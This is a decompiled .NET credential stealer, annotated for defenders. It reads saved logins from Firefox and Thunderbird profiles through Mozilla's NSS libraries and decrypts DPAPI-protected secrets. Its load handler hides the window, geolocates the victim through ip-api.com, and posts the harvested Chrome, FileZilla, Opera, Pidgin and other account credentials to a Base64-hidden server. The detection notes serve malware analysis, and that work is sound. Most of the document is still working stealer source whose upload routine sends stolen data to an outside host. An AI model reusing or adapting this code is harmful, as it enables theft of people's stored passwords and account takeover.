// Token: 0x06000042 RID: 66 RVA: 0x000032A8 File Offset: 0x000014A8
/// <summary>
/// Analysis sample (decompiled credential stealer). Loads Mozilla's own mozglue.dll and
/// nss3.dll from the directory returned by FindFirefoxInstallationPath(), records both module
/// handles in hModuleList, then resolves the "NSS_Init" export by name and calls it with
/// <paramref name="configdir"/>.
/// </summary>
/// <param name="configdir">Directory string handed unchanged to the NSS_Init export.</param>
/// <returns>Whatever the resolved NSS_Init delegate returns; it is not interpreted here.</returns>
/// <remarks>
/// Defender note: the NSS export is resolved at run time, so it does not show up in the
/// binary's import table. A process other than the Mozilla application loading nss3.dll and
/// mozglue.dll from the Firefox install directory is the observable behaviour of this routine.
/// </remarks>
private long NSS_Init(string configdir)
{
    // mozglue.dll is loaded first and only tracked for later FreeLibrary.
    var mozglueHandle = PREC.LoadLibrary(this.FindFirefoxInstallationPath() + "\\mozglue.dll");
    this.hModuleList.Add(mozglueHandle);

    // nss3.dll is kept in the NSS3 field as well, because exports are resolved against it.
    this.NSS3 = PREC.LoadLibrary(this.FindFirefoxInstallationPath() + "\\nss3.dll");
    this.hModuleList.Add(this.NSS3);

    PREC.DLLFunctionDelegate nssInit = this.CreateAPI<PREC.DLLFunctionDelegate>(this.NSS3, "NSS_Init");
    return nssInit(configdir);
}
// Token: 0x06000044 RID: 68 RVA: 0x000034D4 File Offset: 0x000016D4
/// <summary>
/// Analysis sample (decompiled credential stealer). Reads logins.json from the Firefox profile
/// directory of the current user, initialises NSS against that profile, and appends one
/// Account (AccountType.Firefox) per extracted login to this.Accounts.
/// </summary>
/// <returns>
/// true only when the profile directory exists and the whole routine ran without an exception;
/// false otherwise (every exception is swallowed by the outer catch).
/// </returns>
/// <remarks>
/// Defender notes: the observable behaviour is a non-browser process opening
/// "...\AppData\...\logins.json" and loading NSS libraries. DecryptFF is not shown here; if it
/// relies on NSS secret decoding, a profile protected by a Primary Password would presumably not
/// decrypt without it - confirm against the DecryptFF body.
/// The "finally" block with an unassigned enumerator is a decompiler rendering of the foreach
/// clean-up, not hand-written code.
/// </remarks>
public bool RecoverFireFox()
{
    bool result = false;
    checked
    {
        try
        {
            // Profile root is derived from the windir/username environment variables:
            // "<windir without \windows>\users\<username>\AppData".
            string appDataDir = Interaction.Environ("windir").ToLower().Replace("\\windows", null) + "\\users\\" + Interaction.Environ("username") + "\\AppData";
            // FindFirefoxProfilePath is defined elsewhere; only the path separator is normalised here.
            string text = this.FindFirefoxProfilePath(appDataDir).Replace("Profiles/", "Profiles\\");
            if (Directory.Exists(text))
            {
                string input = File.ReadAllText(text + "\\logins.json");
                this.NSS_Init(text + "\\");
                // The JSON is not parsed; quoted values of the three keys are pulled out by regex.
                Regex regex = new Regex("\\\"(hostname|encryptedPassword|encryptedUsername)\":\"(.*?)\"");
                MatchCollection matchCollection = regex.Matches(input);
                int num = 0;
                int num2 = matchCollection.Count - 1;
                int num3 = num;
                // Decompiled counting loop: num3 walks the matches in steps of three.
                for (;;)
                {
                    int num4 = num3;
                    int num5 = num2;
                    if (num4 > num5) { break; }
                    // Matches are consumed as consecutive triples. Presumably the file order is
                    // hostname, encryptedUsername, encryptedPassword - confirm against a sample.
                    // If the match count is not a multiple of three, the indexer throws and the
                    // outer catch turns that into a false return.
                    string value = matchCollection[num3].Groups[2].Value;
                    string value2 = matchCollection[num3 + 1].Groups[2].Value;
                    string value3 = matchCollection[num3 + 2].Groups[2].Value;
                    // First value is stored as-is; the other two go through DecryptFF first.
                    Account item = new Account(AccountType.Firefox, Conversions.ToString(this.DecryptFF(value2)), Conversions.ToString(this.DecryptFF(value3)), value);
                    this.Accounts.Add(item);
                    num3 += 3;
                }
                this.NSS_Shutdown();
                // Unload every module recorded in hModuleList.
                try
                {
                    foreach (IntPtr hModule in this.hModuleList)
                    {
                        PREC.FreeLibrary(hModule);
                    }
                }
                finally
                {
                    List <IntPtr> .Enumerator enumerator;
                    ((IDisposable)enumerator).Dispose();
                }
                result = true;
            }
        }
        catch (Exception ex)
        {
            // Any failure is silent: nothing is logged or rethrown.
            result = false;
        }
        return(result);
    }
}
// Token: 0x0600003B RID: 59 RVA: 0x00002F24 File Offset: 0x00001124
/// <summary>
/// Analysis sample (decompiled credential stealer). Resolves the export named
/// <paramref name="method"/> in the already-loaded module <paramref name="hModule"/> via
/// PREC.GetProcAddress and wraps the address in a delegate of type T with
/// Marshal.GetDelegateForFunctionPointer.
/// </summary>
/// <param name="hModule">Module handle passed to PREC.GetProcAddress.</param>
/// <param name="method">Export name passed to PREC.GetProcAddress.</param>
/// <returns>The delegate cast to T.</returns>
/// <remarks>
/// Only the single assignment to "t" is functional logic. The labels, the num/num2/num4
/// bookkeeping, "@switch(ICSharpCode.Decompiler.ILAst.ILLabel[], ...)", "endfilter" and the
/// undeclared "obj2" are decompiler output for the Visual Basic runtime error-handling state
/// machine (presumably an "On Error" construct - confirm in IL); this text is not compilable C#.
/// Defender note: because exports are resolved by name at run time, the called library
/// functions appear as strings in the binary rather than as import-table entries.
/// </remarks>
private T CreateAPI <T>(IntPtr hModule, string method)
{
    int num;
    T t;
    int num4;
    object obj;
    try
    {
        IL_01: ProjectData.ClearProjectError();
        num = -2;
        IL_09: int num2 = 2;
        // The actual work: export address -> typed delegate.
        t = (T)((object)Marshal.GetDelegateForFunctionPointer(PREC.GetProcAddress(hModule, method), typeof(T)));
        IL_29: goto IL_89;
        // Error-resume dispatch emitted by the decompiler (see remarks).
        IL_2B: int num3 = num4 + 1;
        num4 = 0;
        @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num3);
        IL_45: goto IL_7E;
        IL_47: num4 = num2;
        if (num <= -2) { goto IL_2B; }
        @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num);
        IL_5C :;
    }
    catch when(endfilter(obj is Exception & num != 0 & num4 == 0))
    {
        Exception ex = (Exception)obj2;
        goto IL_47;
    }
    // Reached only through the dispatch above: raises a VB runtime project error.
    IL_7E: throw ProjectData.CreateProjectError(-2146828237);
    IL_89: T result = t;
    if (num4 != 0) { ProjectData.ClearProjectError(); }
    return(result);
}
// Token: 0x0600004D RID: 77 RVA: 0x00003D68 File Offset: 0x00001F68
/// <summary>
/// Reports whether the current process runs under WOW64, as answered by PREC.IsWow64Process.
/// The API is only queried when the OS version is 5.1 or later (major 5 with minor >= 1,
/// or major >= 6); on anything older the method returns false without calling it.
/// </summary>
/// <returns>
/// The flag written by PREC.IsWow64Process, or false when the version gate fails or the
/// call itself reports failure.
/// </returns>
private bool InternalCheckIsWow64()
{
    var osVersion = Environment.OSVersion.Version;
    bool apiExpected = (osVersion.Major == 5 && osVersion.Minor >= 1) || osVersion.Major >= 6;
    if (!apiExpected)
    {
        return false;
    }

    using (Process self = Process.GetCurrentProcess())
    {
        // Starts as false, matching the default value the original (VB-compiled) local carried.
        bool runningUnderWow64 = false;
        bool callSucceeded = PREC.IsWow64Process(self.Handle, ref runningUnderWow64);
        return callSucceeded && runningUnderWow64;
    }
}
// Token: 0x06000046 RID: 70 RVA: 0x0000371C File Offset: 0x0000191C
/// <summary>
/// Analysis sample (decompiled credential stealer). For every folder returned by
/// GetAppDataFolders(), locates a Thunderbird profile, reads its logins.json, initialises NSS
/// against the profile and appends one Account (AccountType.Thunderbird) per extracted login
/// to this.Accounts.
/// </summary>
/// <returns>
/// true when the loop over all folders finished without an exception (whether or not any
/// profile was found); false when any exception occurred, since the outer catch swallows it.
/// </returns>
/// <remarks>
/// Defender notes: WOW64 file-system redirection is switched off for the duration of the search
/// and restored afterwards. The observable behaviour is a non-mail process reading a
/// Thunderbird profile's logins.json and loading NSS libraries. DecryptFF is not shown here.
/// The "finally" block with an unassigned enumerator and "IntPtr ptr = 0" are decompiler
/// renderings, not hand-written code.
/// </remarks>
public bool RecoverThunderbird()
{
    bool result = false;
    IntPtr ptr = 0;
    // ptr receives the value later handed back to Wow64RevertWow64FsRedirection.
    PREC.Wow64DisableWow64FsRedirection(ref ptr);
    checked
    {
        try
        {
            foreach (string appDataDir in this.GetAppDataFolders())
            {
                // FindThunderbirdProfilePath is defined elsewhere.
                string text = this.FindThunderbirdProfilePath(appDataDir);
                if (Directory.Exists(text))
                {
                    string input = File.ReadAllText(text + "\\logins.json");
                    this.NSS_Init(text + "\\");
                    // The JSON is not parsed; quoted values of the three keys are pulled out by regex.
                    Regex regex = new Regex("\\\"(hostname|encryptedPassword|encryptedUsername)\":\"(.*?)\"");
                    MatchCollection matchCollection = regex.Matches(input);
                    int num = 0;
                    int num2 = matchCollection.Count - 1;
                    int num3 = num;
                    // Decompiled counting loop: num3 walks the matches in steps of three.
                    for (;;)
                    {
                        int num4 = num3;
                        int num5 = num2;
                        if (num4 > num5) { break; }
                        // Matches are consumed as consecutive triples. Presumably the file order is
                        // hostname, encryptedUsername, encryptedPassword - confirm against a sample.
                        // A match count that is not a multiple of three makes the indexer throw,
                        // which ends the whole method through the outer catch.
                        string value = matchCollection[num3].Groups[2].Value;
                        string value2 = matchCollection[num3 + 1].Groups[2].Value;
                        string value3 = matchCollection[num3 + 2].Groups[2].Value;
                        // First value is stored as-is; the other two go through DecryptFF first.
                        Account item = new Account(AccountType.Thunderbird, Conversions.ToString(this.DecryptFF(value2)), Conversions.ToString(this.DecryptFF(value3)), value);
                        this.Accounts.Add(item);
                        num3 += 3;
                    }
                    this.NSS_Shutdown();
                    // Unload every module recorded in hModuleList (done once per profile found).
                    try
                    {
                        foreach (IntPtr hModule in this.hModuleList)
                        {
                            PREC.FreeLibrary(hModule);
                        }
                    }
                    finally
                    {
                        List <IntPtr> .Enumerator enumerator;
                        ((IDisposable)enumerator).Dispose();
                    }
                }
            }
            result = true;
        }
        catch (Exception ex)
        {
            // Any failure is silent: nothing is logged or rethrown.
            result = false;
        }
        // Redirection is restored on both the success and the failure path.
        PREC.Wow64RevertWow64FsRedirection(ptr);
        return(result);
    }
}
// Token: 0x06000030 RID: 48 RVA: 0x00002CA8 File Offset: 0x00000EA8
/// <summary>
/// Analysis sample (decompiled credential stealer). Passes <paramref name="Datas"/> to
/// PREC.CryptUnprotectData (Windows DPAPI) and returns the output blob decoded as UTF-8.
/// </summary>
/// <param name="Datas">Protected bytes placed in the input DATA_BLOB.</param>
/// <returns>The decoded output with its final character removed (see the comments below).</returns>
/// <remarks>
/// The return value of CryptUnprotectData is not checked. No prompt structure, description or
/// additional blob is supplied: those arguments are unassigned/default locals in this listing
/// (the third argument is presumably the optional-entropy blob - confirm against the P/Invoke
/// declaration, which is not shown).
/// The labels, the num/num2/num4 bookkeeping, "@switch(...)", "endfilter" and the undeclared
/// "obj2" are decompiler output for the Visual Basic runtime error-handling state machine;
/// this text is not compilable C#.
/// Defender note: DPAPI unprotect calls issued by a process that is not the owning application
/// are the observable behaviour of this routine.
/// </remarks>
private string Decrypt(byte[] Datas)
{
    int num;
    string text;
    int num4;
    object obj;
    try
    {
        IL_01: ProjectData.ClearProjectError();
        num = -2;
        // data_BLOB is the input blob, data_BLOB2 the output blob.
        IL_0A: int num2 = 2;
        PREC.DATA_BLOB data_BLOB = default(PREC.DATA_BLOB);
        IL_15: num2 = 3;
        PREC.DATA_BLOB data_BLOB2 = default(PREC.DATA_BLOB);
        // Pin the managed array to obtain a raw address for the input blob.
        IL_20: num2 = 4;
        GCHandle gchandle = GCHandle.Alloc(Datas, GCHandleType.Pinned);
        IL_2B: num2 = 5;
        data_BLOB.pbData = gchandle.AddrOfPinnedObject();
        IL_3C: num2 = 6;
        data_BLOB.cbData = Datas.Length;
        // The pin is released at this point, i.e. before the native call further down.
        IL_49: num2 = 7;
        gchandle.Free();
        IL_53: num2 = 8;
        string szDataDescr = null;
        PREC.DATA_BLOB data_BLOB4;
        PREC.DATA_BLOB data_BLOB3 = data_BLOB4;
        IntPtr intPtr;
        IntPtr pvReserved = intPtr;
        PREC.CRYPTPROTECT_PROMPTSTRUCT cryptprotect_PROMPTSTRUCT2;
        PREC.CRYPTPROTECT_PROMPTSTRUCT cryptprotect_PROMPTSTRUCT = cryptprotect_PROMPTSTRUCT2;
        PREC.CryptUnprotectData(ref data_BLOB, szDataDescr, ref data_BLOB3, pvReserved, ref cryptprotect_PROMPTSTRUCT, 0, ref data_BLOB2);
        IL_70: num2 = 9;
        checked
        {
            // Buffer is one byte longer than the output; only cbData bytes are copied, so the
            // last byte stays zero and decodes to one trailing character.
            byte[] array = new byte[data_BLOB2.cbData + 1];
            IL_84: num2 = 10;
            Marshal.Copy(data_BLOB2.pbData, array, 0, data_BLOB2.cbData);
            IL_9E: num2 = 11;
            string @string = Encoding.UTF8.GetString(array);
            // Drops that trailing character again.
            IL_B0: num2 = 12;
            text = @string.Substring(0, @string.Length - 1);
            IL_CB: goto IL_15E;
            IL_D0 :;
        }
        // Error-resume dispatch emitted by the decompiler (see remarks).
        int num3 = num4 + 1;
        num4 = 0;
        @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num3);
        IL_114: goto IL_153;
        IL_116: num4 = num2;
        if (num <= -2) { goto IL_D0; }
        @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num);
        IL_12F :;
    }
    catch when(endfilter(obj is Exception & num != 0 & num4 == 0))
    {
        Exception ex = (Exception)obj2;
        goto IL_116;
    }
    // Reached only through the dispatch above: raises a VB runtime project error.
    IL_153: throw ProjectData.CreateProjectError(-2146828237);
    IL_15E: string result = text;
    if (num4 != 0) { ProjectData.ClearProjectError(); }
    return(result);
}
// Token: 0x0600003A RID: 58 RVA: 0x00002F08 File Offset: 0x00001108
/// <summary>
/// Convenience overload: loads the library called <paramref name="name"/> with
/// PREC.LoadLibrary and forwards the resulting handle to the handle-based CreateAPI overload
/// to obtain a delegate of type T for the export <paramref name="method"/>.
/// </summary>
/// <param name="name">Library name or path passed to PREC.LoadLibrary.</param>
/// <param name="method">Export name to resolve.</param>
/// <returns>The delegate produced by the handle-based overload.</returns>
/// <remarks>
/// The handle obtained here is not stored by this method, so nothing in this overload
/// releases it again.
/// </remarks>
private T CreateAPI <T>(string name, string method)
{
    var moduleHandle = PREC.LoadLibrary(name);
    return this.CreateAPI<T>(moduleHandle, method);
}
/// <summary>
/// Analysis sample (decompiled credential stealer): the form's load handler, which is the
/// program's whole run. It hides the window, decodes the Base64-stored server address,
/// reports the host to the server, harvests stored application credentials from the C:\ drive
/// through PREC, uploads them, and exits.
/// </summary>
/// <remarks>
/// Network behaviour visible in this listing, useful for detection:
///  - two cleartext HTTP GETs to "http://ip-api.com/json" (external IP and country lookup);
///  - a POST to "[Host]POST.php?online" with the form fields ip, computername, installdate,
///    country (computername is filled from the "username" environment variable, installdate
///    from today's date);
///  - a POST to "[Host]POST.php?passwordenter" with the fields id and pass, where id is the
///    response body of the first POST.
/// Host is only known after Base64 decoding of the value stored in this.Host; the stored value
/// is not part of this listing.
/// The runs of asterisks inside the two string expressions below appear to be masking applied
/// by the page that hosted this listing: they replace part of the original expression, so
/// those statements are not valid C# as shown. The "finally" block with an unassigned
/// enumerator is a decompiler rendering of the foreach clean-up.
/// </remarks>
private void Form1_Load(object sender, EventArgs e)
{
    // No visible window and no taskbar entry.
    this.Hide();
    this.ShowInTaskbar = false;
    // The server address is stored Base64-encoded and decoded in place at start-up.
    this.Host = Encoding.Default.GetString(Convert.FromBase64String(this.Host));
    string text = Interaction.Environ("username");
    // External IP address: "query" field of the ip-api.com response, extracted by regex.
    string value = Regex.Match(this.Gets("http://ip-api.com/json", new CookieContainer()), "\"query\":\"(.*?)\"").Groups[1].Value;
    string text2 = Conversions.ToString(DateTime.Today.Date);
    // Same endpoint requested a second time for the "country" field.
    string value2 = Regex.Match(this.Gets("http://ip-api.com/json", new CookieContainer()), "\"country\":\"(.*?)\"").Groups[1].Value;
    // Check-in request; the response body (str) is reused as the "id" of the later upload.
    string str = this.Posts(string.Concat(new string[] { "ip=", value, "&computername=", text, "&installdate=", text2, "&country=", value2 }), this.Host + "POST.php?online", new CookieContainer());
    string text3 = null;
    foreach (DriveInfo driveInfo in DriveInfo.GetDrives())
    {
        // Only the drive whose root is exactly "C:\" is processed.
        if (Operators.CompareString(driveInfo.RootDirectory.FullName, "C:\\", false) == 0)
        {
            PREC prec = new PREC(driveInfo);
            PREC prec2 = prec;
            // One recovery routine per targeted application; results accumulate in prec.Accounts.
            prec2.RecoverChrome();
            prec2.RecoverFileZilla();
            prec2.RecoverFireFox();
            prec2.RecoverOpera();
            prec2.RecoverPidgin();
            prec2.RecoverThunderbird();
            try
            {
                // text3 grows by one plain-text record per recovered account.
                foreach (Account account in prec.Accounts)
                {
                    text3 = string.Concat(new string[] { text3, "\r\n\r\n ----[ ", Conversions.ToString((int)account.Type), " ]---- \r\n { Domain : ", account.Domain, " } \r\n { Username : "******" } \r\n { Password : "******" } \r\n" });
                }
            }
            finally
            {
                List <Account> .Enumerator enumerator;
                ((IDisposable)enumerator).Dispose();
            }
        }
    }
    // Upload request (expression partly masked on the page, see remarks).
    this.Posts("id=" + str + "&pass="******"POST.php?passwordenter", new CookieContainer());
    // Terminates the application through the VB runtime once the upload call returns.
    ProjectData.EndApp();
}